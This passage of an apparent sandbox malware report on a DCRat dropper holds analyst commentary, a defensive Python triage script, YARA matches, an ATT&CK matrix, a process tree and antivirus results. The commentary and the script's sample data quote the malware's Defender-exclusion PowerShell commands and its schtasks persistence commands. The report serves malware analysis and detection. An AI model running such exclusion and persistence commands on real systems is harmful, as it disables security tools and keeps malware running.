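The evasion and protection-bypass sections above are raw event rows. What a responder needs from them is the handful of command lines that matter and how they relate: the Add-MpPreference -ExclusionPath calls name exactly the paths that the schtasks /create entries later launch (WmiPrvSE.exe every 9 minutes, the wnSgp... binary at logon with /rl HIGHEST), so the Defender exclusions are staged for the persistence payload rather than for the dropper, and the cmd.exe to "ping -n 10 localhost" pair is a sleep of roughly nine seconds (ping sends one echo request per second and the loopback answers immediately). The many "Thread delayed: 922337203685477" rows are weaker evidence: that figure is 2^63 / 10^4, which is what a 0x8000000000000000 relative timeout in 100 ns units (the kernel's encoding of an INFINITE wait) becomes when converted to milliseconds, and the 2x and 3x multiples on some threads are sums over several such waits; idle threads in any .NET host process park on waits like that, so those rows do not show evasion on their own. That reading of the value is mine, not a statement the report makes. The script below is an added example, not part of the Joe Sandbox report and not code from the malware: it parses process-creation rows in the report's own layout (the sample input is copied from the rows above and embedded as constructed data), applies a few rules whose names and thresholds are my own, and correlates the excluded paths with the scheduled-task targets.

```python
"""Added example: rule-based triage of the report's process-creation rows."""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional, Set

# Constructed sample input: command lines copied from the report above, in its
# own "Source: <parent> Process created: <child> <command line>" layout.
SAMPLE_EVENTS = r"""
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe'
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe'
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\msproviderBrokerMonitornet\WinPerfcommon.exe'
Source: C:\Users\user\Desktop\top.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\msproviderBrokerMonitornet\qGDN1Ee4B98z7IBsvEaYenHfp3i4NGluh1QU7ALIT.vbe"
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\04s13a00\04s13a00.cmdline"
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe'" /f
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wnSgpBKJabSHvDawwFjyhiOtGEGVta" /sc ONLOGON /tr "'C:\Users\user\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe'" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
"""

EVENT_RE = re.compile(r"^Source: (?P<parent>.+?) Process created: (?P<child>\S+) ?(?P<cmdline>.*)$")

@dataclass(frozen=True)
class Finding:
    rule: str    # rule name chosen for this example (not a Joe Sandbox signature name)
    parent: str  # creating process image
    child: str   # created process image
    value: str   # normalised path or target the rule keyed on
    note: str = ""

def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def _norm(path: str) -> str:
    return path.strip().strip("'\"").lower()

def rule_defender_exclusion(parent: str, child: str, cmdline: str) -> Optional[Finding]:
    # Add-MpPreference -Exclusion{Path,Process,Extension}: capture what gets excluded.
    if _basename(child) not in ("powershell.exe", "pwsh.exe"):
        return None
    m = re.search(r"Add-MpPreference\s+-Exclusion(Path|Process|Extension)\s+'?([^']+?)'?\s*$", cmdline, re.I)
    return Finding("defender_exclusion", parent, child, _norm(m.group(2)), m.group(1)) if m else None

def rule_schtasks_persistence(parent: str, child: str, cmdline: str) -> Optional[Finding]:
    # schtasks /create: capture the launched binary, the trigger and the run level.
    if _basename(child) != "schtasks.exe" or not re.search(r"/create\b", cmdline, re.I):
        return None
    tr = re.search(r'/tr\s+(?:"([^"]*)"|(\S+))', cmdline, re.I)
    sc = re.search(r"/sc\s+(\S+)", cmdline, re.I)
    mo = re.search(r"/mo\s+(\S+)", cmdline, re.I)
    rl = re.search(r"/rl\s+(\S+)", cmdline, re.I)
    note = (sc.group(1).upper() if sc else "?") + (f"/{mo.group(1)}" if mo else "")
    if rl and rl.group(1).upper() == "HIGHEST":
        note += ", /rl HIGHEST"
    target = _norm(tr.group(1) or tr.group(2)) if tr else ""
    return Finding("schtasks_persistence", parent, child, target, note)

def rule_ping_sleep(parent: str, child: str, cmdline: str) -> Optional[Finding]:
    # ping -n N to the loopback: one echo per second, so roughly N-1 seconds of delay.
    tokens = cmdline.split()
    m = re.search(r"-n\s+(\d+)", cmdline, re.I)
    if (_basename(child) != "ping.exe" or not m or not tokens
            or tokens[-1].lower() not in ("localhost", "127.0.0.1", "::1")):
        return None
    return Finding("ping_as_sleep", parent, child, tokens[-1].lower(), f"~{int(m.group(1)) - 1}s delay")

def rule_script_host(parent: str, child: str, cmdline: str) -> Optional[Finding]:
    # wscript/cscript launching a script file (here the .vbe stage of the dropper).
    if _basename(child) not in ("wscript.exe", "cscript.exe"):
        return None
    m = re.search(r'"?([^"\s]+\.(?:vbe|vbs|jse|js|wsf))"?', cmdline, re.I)
    return Finding("script_host_launch", parent, child, _norm(m.group(1))) if m else None

RULES = (rule_defender_exclusion, rule_schtasks_persistence, rule_ping_sleep, rule_script_host)

def triage(report_lines: Iterable[str]) -> List[Finding]:
    """Apply every rule to every parsable 'Process created' row; unparsable rows are skipped."""
    findings: List[Finding] = []
    for line in report_lines:
        m = EVENT_RE.match(line.strip())
        if not m:
            continue
        for rule in RULES:
            found = rule(m["parent"], m["child"], m["cmdline"])
            if found:
                findings.append(found)
    return findings

def excluded_and_scheduled(findings: Iterable[Finding]) -> Set[str]:
    """Paths both excluded from Defender scanning and registered as scheduled tasks."""
    fs = list(findings)
    excluded = {f.value for f in fs if f.rule == "defender_exclusion"}
    scheduled = {f.value for f in fs if f.rule == "schtasks_persistence"}
    return excluded & scheduled

if __name__ == "__main__":
    results = triage(SAMPLE_EVENTS.splitlines())
    for f in results:
        print(f"{f.rule:<22} {_basename(f.parent)} -> {_basename(f.child)}: {f.value} {f.note}".rstrip())
    print("excluded AND scheduled:", sorted(excluded_and_scheduled(results)))
```

Run against the embedded rows it reports three exclusions, one script-host launch, two task registrations and one loopback ping, and the intersection returns the two paths (the WmiPrvSE.exe lookalike under WindowsHolographicDevices and the user-profile wnSgp... binary) that the sample both whitelisted and scheduled. The csc.exe row matches none of the four rules and is passed over, and a ping to a non-loopback address is not flagged as a sleep; on a live host the same correlation can be done against Get-MpPreference and the task scheduler instead of report rows.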
Source: C:\Users\user\Desktop\top.exe Code function: 0_2_0046F654 cpuid 0_2_0046F654
Source: C:\Users\user\Desktop\top.exe Code function: GetLocaleInfoW,GetNumberFormatW, 0_2_0046AF0F
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeQueries volume information: C:\msproviderBrokerMonitornet\WinPerfcommon.exe VolumeInformationJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeQueries volume information: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe VolumeInformationJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeQueries volume information: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                     Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
                                     Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Queries volume information: C:\msproviderBrokerMonitornet\WinPerfcommon.exe VolumeInformation
                                     Source: C:\Users\user\Desktop\top.exe Code function: 0_2_0046DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle, 0_2_0046DF1E
                                     Source: C:\Users\user\Desktop\top.exe Code function: 0_2_0045B146 GetVersionExW, 0_2_0045B146
                                     Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                                    Stealing of Sensitive Information

                                     Source: Yara match File source: 00000006.00000002.2441510550.0000000012C8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                     Source: Yara match File source: Process Memory Space: WinPerfcommon.exe PID: 1020, type: MEMORYSTR
                                     Source: Yara match File source: top.exe, type: SAMPLE
                                     Source: Yara match File source: 0.3.top.exe.664c701.0.raw.unpack, type: UNPACKEDPE
                                     Source: Yara match File source: 0.3.top.exe.6f5c701.1.raw.unpack, type: UNPACKEDPE
                                     Source: Yara match File source: 0.3.top.exe.6f5c701.1.unpack, type: UNPACKEDPE
                                     Source: Yara match File source: 0.3.top.exe.664c701.0.unpack, type: UNPACKEDPE
                                     Source: Yara match File source: 6.0.WinPerfcommon.exe.6e0000.0.unpack, type: UNPACKEDPE
                                     Source: Yara match File source: 00000006.00000000.2354556207.00000000006E2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                     Source: Yara match File source: 00000000.00000003.2044302589.00000000065FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                     Source: Yara match File source: 00000000.00000003.2045393819.0000000006F0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                     Source: Yara match File source: C:\Program Files (x86)\Windows Portable Devices\OfficeClickToRun.exe, type: DROPPED
                                     Source: Yara match File source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe, type: DROPPED
                                     Source: Yara match File source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe, type: DROPPED
                                     Source: Yara match File source: C:\Program Files\MSBuild\Microsoft\SystemSettings.exe, type: DROPPED
                                     Source: Yara match File source: C:\ProgramData\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe, type: DROPPED
                                    Source: Yara matchFile source: top.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.top.exe.664c701.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.top.exe.6f5c701.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.top.exe.6f5c701.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.top.exe.664c701.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 6.0.WinPerfcommon.exe.6e0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Program Files (x86)\Windows Portable Devices\OfficeClickToRun.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\MSBuild\Microsoft\SystemSettings.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\ProgramData\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe, type: DROPPED

                                    Remote Access Functionality

                                    Source: Yara match, file source: 00000006.00000002.2441510550.0000000012C8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match, file source: Process Memory Space: WinPerfcommon.exe PID: 1020, type: MEMORYSTR
                                    Source: Yara match, file source: top.exe, type: SAMPLE
                                    Source: Yara match, file source: 0.3.top.exe.664c701.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match, file source: 0.3.top.exe.6f5c701.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match, file source: 0.3.top.exe.6f5c701.1.unpack, type: UNPACKEDPE
                                    Source: Yara match, file source: 0.3.top.exe.664c701.0.unpack, type: UNPACKEDPE
                                    Source: Yara match, file source: 6.0.WinPerfcommon.exe.6e0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara match, file source: 00000006.00000000.2354556207.00000000006E2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara match, file source: 00000000.00000003.2044302589.00000000065FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match, file source: 00000000.00000003.2045393819.0000000006F0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match, file source: C:\Program Files (x86)\Windows Portable Devices\OfficeClickToRun.exe, type: DROPPED
                                    Source: Yara match, file source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe, type: DROPPED
                                    Source: Yara match, file source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe, type: DROPPED
                                    Source: Yara match, file source: C:\Program Files\MSBuild\Microsoft\SystemSettings.exe, type: DROPPED
                                    Source: Yara match, file source: C:\ProgramData\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe, type: DROPPED

                                    MITRE ATT&CK matrix (numbers in parentheses: count of matched signatures for that technique)

                                    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                                    Gather Victim Identity Information | Scripting (11) | Valid Accounts | Windows Management Instrumentation (11) | Scripting (11) | DLL Side-Loading (1) | Disable or Modify Tools (11) | OS Credential Dumping | System Time Discovery (1) | Taint Shared Content (1) | Archive Collected Data (1) | Encrypted Channel (1) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                                    Credentials | Domains | Default Accounts | Exploitation for Client Execution (1) | DLL Side-Loading (1) | Process Injection (11) | Deobfuscate/Decode Files or Information (1) | LSASS Memory | File and Directory Discovery (3) | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service
                                    Email Addresses | DNS Server | Domain Accounts | Command and Scripting Interpreter (2) | Scheduled Task/Job (1) | Scheduled Task/Job (1) | Obfuscated Files or Information (3) | Security Account Manager | System Information Discovery (37) | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact
                                    Employee Names | Virtual Private Server | Local Accounts | Scheduled Task/Job (1) | Registry Run Keys / Startup Folder (21) | Registry Run Keys / Startup Folder (21) | Software Packing (3) | NTDS | Security Software Discovery (121) | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
                                    Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | DLL Side-Loading (1) | LSA Secrets | Process Discovery (1) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                                    Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | File Deletion (1) | Cached Domain Credentials | Virtualization/Sandbox Evasion (31) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                                    DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Masquerading (143) | DCSync | Application Window Discovery (1) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                                    Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Virtualization/Sandbox Evasion (31) | Proc Filesystem | Remote System Discovery (1) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                                    Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | Process Injection (11) | /etc/passwd and /etc/shadow | System Network Configuration Discovery (1) | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                                    Behavior Graph (ID: 1589198, Sample: top.exe, Start date: 11/01/2025, Architecture: WINDOWS, Score: 100)

                                    Signatures on the sample: Suricata IDS alerts for network traffic; Found malware configuration; Antivirus detection for dropped file; 13 other signatures

                                    • top.exe (started)
                                        dropped: C:\...\WinPerfcommon.exe, PE32
                                        • wscript.exe (started)
                                            signatures: Windows Scripting host queries suspicious COM object (likely to drop second stage); Suspicious execution chain found
                                            • cmd.exe (started)
                                                • WinPerfcommon.exe (started)
                                                    dropped: C:\...\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe, PE32; C:\Users\user\Desktop\qMBWbOkw.log, PE32; C:\Users\user\Desktop\kTYwyifI.log, PE32; 11 other malicious files
                                                    signatures: Multi AV Scanner detection for dropped file; Creates an undocumented autostart registry key; Creates multiple autostart registry keys; 4 other signatures
                                                    • cmd.exe (started)
                                                        signatures: Uses ping.exe to sleep; Uses ping.exe to check the status of other devices and networks
                                                        • 3 other processes
                                                    • csc.exe (started)
                                                        dropped: C:\Program Files (x86)\...\msedge.exe, PE32
                                                        signatures: Infects executable files (exe, dll, sys, html)
                                                        • conhost.exe (started)
                                                        • cvtres.exe (started)
                                                    • csc.exe (started)
                                                        dropped: C:\Windows\...\SecurityHealthSystray.exe, PE32
                                                        • conhost.exe (started)
                                                        • cvtres.exe (started)
                                                    • 8 other processes
                                                        signatures: Loading BitLocker PowerShell Module
                                                        • conhost.exe (started)
                                                        • conhost.exe (started)
                                                        • conhost.exe (started)
                                                        • 3 other processes
                                                • conhost.exe (started)
                                                • Conhost.exe (started)
                                    • wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe (started)
                                        signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
                                    • wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe (started)
                                    • 2 other processes

                                    Source | Detection | Scanner | Label | Link
                                    top.exe | 57% | Virustotal | | Browse
                                    top.exe | 58% | ReversingLabs | ByteCode-MSIL.Trojan.Uztuby |
                                    top.exe | 100% | Avira | VBS/Runner.VPG |
                                    top.exe | 100% | Joe Sandbox ML | |

                                    Source | Detection | Scanner | Label | Link
                                    C:\Program Files\MSBuild\Microsoft\SystemSettings.exe | 100% | Avira | HEUR/AGEN.1323342 |
                                    C:\ProgramData\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe | 100% | Avira | HEUR/AGEN.1323342 |
                                    C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe | 100% | Avira | HEUR/AGEN.1323342 |
                                    C:\Users\user\Desktop\kTYwyifI.log | 100% | Avira | TR/PSW.Agent.qngqt |
                                    C:\Users\user\Desktop\alFgOGaa.log | 100% | Avira | TR/AVI.Agent.updqb |
                                    C:\Program Files (x86)\Windows Portable Devices\OfficeClickToRun.exe | 100% | Avira | HEUR/AGEN.1323342 |
                                    C:\Users\user\AppData\Local\Temp\emoAWdy2Gj.bat | 100% | Avira | BAT/Delbat.C |
                                    C:\Users\user\Desktop\Qxaqfufs.log | 100% | Avira | TR/AD.BitpyRansom.lcksd |
                                    C:\Program Files\MSBuild\Microsoft\SystemSettings.exe | 100% | Joe Sandbox ML | |
                                    C:\ProgramData\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe | 100% | Joe Sandbox ML | |
                                    C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe | 100% | Joe Sandbox ML | |
                                    C:\Users\user\Desktop\kTYwyifI.log | 100% | Joe Sandbox ML | |
                                    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | 100% | Joe Sandbox ML | |
                                    C:\Program Files (x86)\Windows Portable Devices\OfficeClickToRun.exe | 100% | Joe Sandbox ML | |
                                    C:\Users\user\Desktop\SHwrfMKt.log | 100% | Joe Sandbox ML | |
                                    C:\Program Files (x86)\Windows Portable Devices\OfficeClickToRun.exe | 63% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                                    C:\Program Files (x86)\Windows Portable Devices\OfficeClickToRun.exe | 70% | Virustotal | | Browse
                                    C:\Program Files\MSBuild\Microsoft\SystemSettings.exe | 63% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                                    C:\Program Files\MSBuild\Microsoft\SystemSettings.exe | 70% | Virustotal | | Browse
                                    C:\ProgramData\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe | 63% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                                    C:\ProgramData\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe | 70% | Virustotal | | Browse
                                    C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe | 63% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                                    C:\Users\user\Desktop\GOHavRZK.log | 38% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
                                    C:\Users\user\Desktop\Qxaqfufs.log | 33% | ReversingLabs | Win32.Ransomware.Bitpy |
                                    C:\Users\user\Desktop\SHwrfMKt.log | 9% | ReversingLabs | |
                                    C:\Users\user\Desktop\ZndYtGLf.log | 25% | ReversingLabs | |
                                    C:\Users\user\Desktop\alFgOGaa.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                                    C:\Users\user\Desktop\kTYwyifI.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                                    C:\Users\user\Desktop\qMBWbOkw.log | 8% | ReversingLabs | |
                                    C:\Users\user\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe | 63% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                                    C:\msproviderBrokerMonitornet\WinPerfcommon.exe | 63% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                                    No Antivirus matches
                                    No Antivirus matches
                                    No Antivirus matches
                                    No contacted domains info
                                    Name | Source | Malicious | Antivirus Detection | Reputation
                                    http://nuget.org/NuGet.exe | powershell.exe, 00000026.00000002.3505599922.0000015E10073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.3617998223.0000016722D93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.3553159846.0000020C90074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.3412038875.000001F010073000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                    https://aka.ms/pscore68 | powershell.exe, 00000026.00000002.2545978060.0000015E00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2559172404.0000016712D21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2562204503.00000166BE381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2548440959.0000020C80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2547766484.000001F000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2565541870.000001105DF21000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                    http://pesterbdd.com/images/Pester.png | powershell.exe, 0000002F.00000002.2565541870.000001105E147000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                    http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000026.00000002.2545978060.0000015E00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2559172404.0000016712F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2562204503.00000166BE5A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2548440959.0000020C80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2547766484.000001F000228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2565541870.000001105E147000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | WinPerfcommon.exe, 00000006.00000002.2427021597.0000000002D16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2545978060.0000015E00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2559172404.0000016712D21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2562204503.00000166BE381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2548440959.0000020C80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2547766484.000001F000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2565541870.000001105DF21000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                    http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000002F.00000002.2565541870.000001105E147000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                    https://github.com/Pester/Pester | powershell.exe, 0000002F.00000002.2565541870.000001105E147000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                    http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000026.00000002.2545978060.0000015E00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2559172404.0000016712F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2562204503.00000166BE5A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2548440959.0000020C80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2547766484.000001F000228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2565541870.000001105E147000.00000004.00000800.00020000.00000000.sdmp | false | | high
